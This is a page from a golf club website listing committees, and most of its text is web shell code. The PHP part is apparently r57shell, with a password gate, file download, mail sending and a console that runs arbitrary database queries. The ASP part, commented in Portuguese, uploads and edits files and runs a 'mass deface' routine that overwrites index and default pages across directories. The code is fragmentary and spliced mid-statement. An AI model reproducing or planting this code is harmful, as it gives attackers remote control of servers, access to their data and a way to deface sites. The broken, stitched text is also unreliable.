"; } echo "
 
 
"; } echo "

List of Committees

Men's Committee

    $v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) { header('WWW-Authenticate: Basic realm="r57shell"'); header('HTTP/1.0 401 Unauthorized'); exit("r57shell : Access Denied"); } } $head = ' r57shell '; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name=\"".$attach['name']."\"\r\n"; $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; @ob_clean(); header("Content-type: image/gif"); echo base64_decode($images[$_GET['img']]); die(); } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
    [ BACK ]
    "; die(); } if ($_POST['cmd']=="db_query") { echo $head; switch($_POST['db']) { case 'MySQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
    "; $res = @mysql_query($query,$db); $error = @mysql_error($db); if($error) { echo "
    Error : ".$error."

    "; } else { if (@mysql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($res))) { $keys = @implode("
", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode(" ",$values); $sql2 .= "
".$values."
"; $sql = ""; $sql .= $sql2; echo $sql; echo "
".$keys."

"; } else { if(($rows = @mysql_affected_rows($db))>=0) { echo "
affected rows : ".$rows."

"; } } } @mysql_free_result($res); } } @mysql_close($db); } else echo "
Can't connect to MySQL server
"; break; case 'MSSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @mssql_query($query,$db); if (@mssql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mssql_fetch_assoc($res))) { $keys = @implode("
", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode(" ",$values); $sql2 .= "
".$values."
"; $sql = ""; $sql .= $sql2; echo $sql; echo "
".$keys."

"; } /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "
affected rows : ".$rows."

"; } else { echo "
Error : ".$error."

"; }} */ @mssql_free_result($res); } } @mssql_close($db); } else echo "
Can't connect to MSSQL server
"; break; case 'PostgreSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; $db = @pg_connect($str); if($db) { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @pg_query($db,$query); $error = @pg_errormessage($db); if($error) { echo "
Error : ".$error."

"; } else { if (@pg_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @pg_fetch_assoc($res))) { $keys = @implode(" ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode(" ",$values); $sql2 .= " ".$values." "; } echo ""; $sql = ""; $sql .= $sql2; echo $sql; echo "
".$keys."

"; } else { if(($rows = @pg_affected_rows($res))>=0) { echo "
affected rows : ".$rows."

"; } } } @pg_free_result($res); } } @pg_close($db); } else echo "
Can't connect to PostgreSQL server
"; break; case 'Oracle': $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); if(($error = @ocierror())) { echo "
Can't connect to Oracle server.
".$error['message']."
"; } else { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "Query#".$num." : ".htmlspecialchars($query)."
"; $stat = @ociparse($db, $query); @ociexecute($stat); if(($error = @ocierror())) { echo "
Error : ".$error['message']."

"; } else { $rowcount = @ocirowcount($stat); if($rowcount != 0) {echo "
affected rows : ".$rowcount."

";} else { echo ""; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } echo ""; while(ocifetch($stat)) { echo ""; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } echo ""; } echo "
".htmlspecialchars(@ocicolumnname($stat, $j))."
".htmlspecialchars(@ociresult($stat, $j))."

"; } @ocifreestatement($stat); } } } @ocilogoff($db); } break; } echo "
"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "

" Response.Write "" Response.Write "     " Set a = Nothing Set fso = Nothing Else Select Case Trim(Request.Form("savemethod")) Case "Save" Set fso = CreateObject("Scripting.FileSystemObject") novotexto = Trim(Request.Form("content")) novotexto = Split(novotexto,vbCrLf) Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2) For i = 0 To UBound(novotexto) objstream.WriteLine(novotexto(i)) Next objstream.Close Set objstream = Nothing Response.Write "Texto salvo: " & Replace(Trim(Request.Form("path")),"|","\") & "" Case "Save as" Set fso = CreateObject("Scripting.FileSystemObject") novotexto = Trim(Request.Form("content")) novotexto = Split(novotexto,vbCrLf) caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" Set objstream = fso.CreateTextFile(caminho,true,false) For i = 0 To UBound(novotexto) objstream.WriteLine(novotexto(i)) Next objstream.Close Set objstream = Nothing Response.Write "
" Response.Write "
" Response.Write "" Response.Write "
" Case Else caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" Set ObjFSO = CreateObject("Scripting.FileSystemObject") Set MyFile = ObjFSO.GetFile(caminho) destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename")) MyFile.Move (destino) If Err.Number = 0 Then Response.Write "


Arquivo: " & destino & " salvo!" Response.Write "" End If End Select End If Case "download" Response.Buffer = True Response.Clear strFileName = Replace(Trim(Request.QueryString("file")),"|","\") strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\")) strFileType = Request.QueryString("type") if strFileType = "" then strFileType = "application/download" Set fso = Server.CreateObject("Scripting.FileSystemObject") Set f = fso.GetFile(strFilename) intFilelength = f.size Set f = Nothing Set fso = Nothing Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile Response.AddHeader "Content-Length", intFilelength Response.Charset = "UTF-8" Response.ContentType = strFileType Set Stream = Server.CreateObject("ADODB.Stream") Stream.Open Stream.type = 1 Stream.LoadFromFile strFileName Response.BinaryWrite Stream.Read Response.Flush Stream.Close Set Stream = Nothing Case "upload" If Request.QueryString("processupload") <> "yes" Then Response.Write "
" Response.Write "" Response.Write "" Response.Write "" Response.Write "
Select a file to upload:
" Else Set Uploader = New FileUploader Uploader.Upload() If Uploader.Files.Count = 0 Then Response.Write "File(s) not uploaded." Else For Each File In Uploader.Files.Items File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\") Response.Write "File Uploaded: " & File.FileName & "
" Response.Write "Size: " & File.FileSize & " bytes
" Response.Write "Type: " & File.ContentType & "

" Response.Write "" Next End If End If Case "mass" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo) On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminhodomass) Set ColFolders = MonRep.SubFolders for each folderItem in ColFolders destino1 = folderItem.path & "\index.htm" destino2 = folderItem.path & "\index.html" destino3 = folderItem.path & "\index.asp" destino4 = folderItem.path & "\index.cfm" destino5 = folderItem.path & "\index.php" destino6 = folderItem.path & "\default.htm" destino7 = folderItem.path & "\default.html" destino8 = folderItem.path & "\default.asp" destino9 = folderItem.path & "\default.cfm" destino10 = folderItem.path & "\default.php" MeuArquivo.Copy(destino1) MeuArquivo.Copy(destino2) MeuArquivo.Copy(destino3) MeuArquivo.Copy(destino4) MeuArquivo.Copy(destino5) MeuArquivo.Copy(destino6) MeuArquivo.Copy(destino7) MeuArquivo.Copy(destino8) MeuArquivo.Copy(destino9) MeuArquivo.Copy(destino10) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "
<DIR> " & folderItem.path & "  DONE!
  " & UCase(Err.Description) & "
" End If Err.Number = 0 Response.Flush If metodo = "brute" Then Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo) End If next End Sub Sub brutemass(caminho,massaction) If massaction = "test" Then On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminho) Set ColFolders = MonRep.SubFolders Set ColFiles0 = MonRep.Files for each folderItem in ColFolders Set TotalFolders = ObjFSO.GetFolder(folderItem.path) Set EachFolder = TotalFolders.SubFolders Response.Write "" maindestino = folderItem.path & "\" MeuArquivo.Copy(maindestino) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "" End If Err.Number = 0 Response.Flush If EachFolder.count > 0 Then masscontador = 0 for each subpasta in EachFolder masscontador = masscontador + 1 destino = subpasta.path & "\" If masscontador = 1 Then destinofinal = destino pathfinal = subpasta.path Err.Number = 0 MeuArquivo.Copy(destinofinal) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "" End If Err.Number = 0 Response.Flush Else MeuArquivo.Copy(destino) Response.Write "" If Err.Number = 0 Then Response.Write "" Else Response.Write "" End If Err.Number = 0 Response.Flush End If next masscontador = 0 End If Response.Write "
<DIR> " & maindestino & "  Acesso Permitido
  " & UCase(Err.Description) & "
<DIR> " & showobj(pathfinal) & "  Acesso Permitido
  " & UCase(Err.Description) & "
<DIR> " & showobj(subpasta.path) & "  Acesso Permitido
  " & UCase(Err.Description) & "

" Call brutemass(folderItem.path & "\","test") next Set MonRep = Nothing Set ColFolders = Nothing Set ColFiles0 = Nothing Else If Request.Form.Count = 0 Then Response.Write "

Brute: Test and Deface root and sub directories.

" Response.Write "Single: Test and deface only root directories.

" Response.Write "" Response.Write "" Response.Write "
Deface Code:
" Response.Write "
" Response.Write "Brute   " Response.Write "Single
" Response.Write "
" Response.Write "" Else Set ObjFSO = CreateObject("Scripting.FileSystemObject") patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) arquivomassdfc = patharquivotxt & "teste.txt" Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False) vetordelinhas = Split(Request.Form("content"),VbCrLf) For i = 0 To UBound(vetordelinhas) Arquivotxt.WriteLine(vetordelinhas(i)) Next Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc) If Request.Form("massopt") = "single" Then Call themassdeface(caminho,"single",ObjFSO,MeuArquivo) ElseIf Request.Form("massopt") = "brute" Then Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo) End If End If End If End Sub If Trim(Request.QueryString("massact")) = "test" Then Set ObjFSO = CreateObject("Scripting.FileSystemObject") patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) arquivo = patharquivotxt & "_vti_cnf.log" Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True) Set MeuArquivo = ObjFSO.GetFile(arquivo) Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test") ElseIf Trim(Request.QueryString("massact")) = "dfc" Then Call brutemass(Replace(Trim(Request.For

     

Committees
    All content Birr Golf Club © 2004, All Rights Reserved.
Design and Development by Lightholder Productions